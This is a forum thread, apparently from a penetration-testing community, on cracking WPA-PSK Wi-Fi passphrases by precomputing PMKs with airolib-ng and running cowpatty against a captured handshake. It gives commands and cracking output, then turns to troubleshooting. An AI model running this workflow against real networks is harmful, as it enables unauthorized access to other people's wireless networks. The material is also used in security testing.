Airolib-ng and cowpatty

[shamanvirtuel]

it's not really a tut but some hints for help those who wants to speed up things when attacking wpa

I assume you have a wpa handshake capture in cap format(airodump+deauth)

we are working on a network with essid test

i assume you already get airolib-ng(1.0 dev) and have initiated a database give it a large password file(mine is 172000+ passwd) and have precomputed it if you have add some essid

the trick is to add essid in db, precompute key with airolib-ng and to export pmk for this essid

airolib-ng DB2 stats(where DB2 is my database)
statsThere are 2 ESSIDs and 172747 passwords in the database. 345494 out of 345494 possible combinations have been computed (100%).

ESSID Priority Done
Livebox-a5a3 64 100.0
test 64 100.0

hopefully i already get "test" as essid in my db, if not i add it to db and recompute table 172000 password=172000 pmk to generate for an essid (aprox 30 min)

i now export it in cowpatty(genpmk) format
(where DB2 is database, "test" the essid to export, testpmk the pmk output file)
airolib-ng DB2 export cowpatty "test" testpmk
exportExporting...
Done.

now we test the pmk against essid
testpmk is the exported file from airolib-ng, "test" the essid, -v verbose -r ...wpa.cap the handshake capture
cowpatty -d testpmk -s "test" -v -r /pentest/wireless/aircrack-ng/test/wpa.cap
cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: arrojadite
key no. 20000: calligraphical
key no. 30000: contestation
key no. 40000: dislocatory
key no. 50000: femineity
key no. 60000: hemadromometer
key no. 70000: interlimitation
key no. 80000: marquisotte
key no. 90000: nonannulment
key no. 100000: pancreatotomy
key no. 110000: pontificality
key no. 120000: raspingly
key no. 130000: semiflashproof
key no. 140000: subdecuple
key no. 150000: trancedly
key no. 160000: unimportance
key no. 170000: weightlessness

The PSK is "biscotte".

172747 passphrases tested in 2.71 seconds: 63642.26 passphrases/second

yep you've done it....
i like the conjonction of cowpatty+sql database of precomputed keys....really nice.....just need time(less and less....) and a HUGE password file....

just a little exemple of what can be done with this nice tools.....

[-=Xploitz=-]

You must have a fast processor Shaman...cause I got almost 500,000 passwords and this is my output after 18 minutes!!!>>>

{-=Xploitz=-} ~ # airolib-ng testdb batch
Computed 50000 PMK in 1067 seconds (46 PMK/s, 200000 in buffer).


And in another tab.....


{-=Xploitz=-} ~ # airolib-ng testdb stats
statsThere are 1 ESSIDs and 472992 passwords in the database. 50000 out of 472992 possible combinations have been computed (10.571%).

ESSID Priority Done
Xploitz Network 64 10.57

only 10%!!!!

[shamanvirtuel]

well you do need to precompute the all table

when you precompute it you can win 3x times on verifying pmk.... but you need to have your table precompute......

don't you remember prez thread on time memory....
it was with a tl50 core2duo....(not a fast one....)

2 go of ram(maybe that helps)

[-=Xploitz=-]

Yea..Im having some MAJOR issues with that thread, balding_parrot, and Funnyman as well. Take a look...we need major help with cowpatty.

Code:

http://forums.remote-exploit.org/showthread.php?p=36325#post36325

[-=Xploitz=-]

So many problems with this as well...geesh. What steps did you take to make the databases? Cause I went to the aircrack-ng main site..and TRIED to follow their tutorial..but after I run the

airolib-ng testdb batch
Computed 4292 PMK in 102 seconds (42 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

I ^C to exit..and try your

airolib-ng testdb stats
statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

ESSID Priority Done
64 100.0
Xploitz 64 100.0

Cool so far right??

Now I do your airolib-ng testdb export cowpatty "Xploitz" testpmk

exportThere is no such ESSID in the database or there are no PMKs for it.


What gives???

[-=Xploitz=-]

Heres a complete list of EVERYTHING I did in order.....


{-=Xploitz=-} ~ # airolib-ng testdb init

Now I make a ssidlist.txt and put ONLY Xploitz inside it and save

{-=Xploitz=-} ~ # airolib-ng testdb import ascii essid ssidlist.txt
importReading...
Writing...
Done.
{-=Xploitz=-} ~ # airolib-ng testdb import ascii passwd algae.txt
importReading...
Writing... read, 411 invalid lines ignored.
Done.
{-=Xploitz=-} ~ # airolib-ng testdb batch
Computed 4292 PMK in 75 seconds (57 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

{-=Xploitz=-} ~ # airolib-ng testdb stats
statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

Where in the hell is this 2nd essid?? I only have 1 in it, and its called Xploitz

ESSID Priority Done
64 100.0
Xploitz 64 100.0

{-=Xploitz=-} ~ # airolib-ng testdb export cowpatty "Xploitz" testpmk
exportThere is no such ESSID in the database or there are no PMKs for it.

So I tried it without the quotes......

{-=Xploitz=-} ~ # airolib-ng testdb export cowpatty Xploitz testpmk
exportThere is no such ESSID in the database or there are no PMKs for it.
{-=Xploitz=-} ~ # WHAT GIVES????

[balding_parrot]

I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
I just cannot find what it is YET

[-=Xploitz=-]

Quote:

Originally Posted by balding_parrot

I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
I just cannot find what it is YET

Geesh..you to balding_parrot?? First " Benefits of Time-Memory Trade-Off in coWPAtty" , by theprez98, gives us problems...now airolib-ng is jacking us around!!! Gesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what were missing.

[balding_parrot]

Quote:

Originally Posted by -=Xploitz=-

Geesh..you to balding_parrot?? First " Benefits of Time-Memory Trade-Off in coWPAtty" , by theprez98, gives us problems...now airolib-ng is jacking us around!!! Gesh,..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what were missing.

There must be a connection somewhere, something so obvious.......

Not sure about it saving time..... It is certainly using up enough.....

Just think when we do get it working, with the amount of time we have spent on it, it's going to tell us the key before we even ask for it

[-=Xploitz=-]

C'mon Shaman...what are all the steps you took from begenning to end? This damn airolib is driving me crazy!! I asked on the aircrack forums..and darkAudix said he was doing EXACTLY the same thing as me with the same dev or aircrack..and he got it to work..but mine won't!! So my other question for you Niko is...

Could it be that balding_parrots sqlite module is at fault? Aircrack main site says You must be running version 3.3.17 or above ..and parrots is 3.4..please help us Shaman.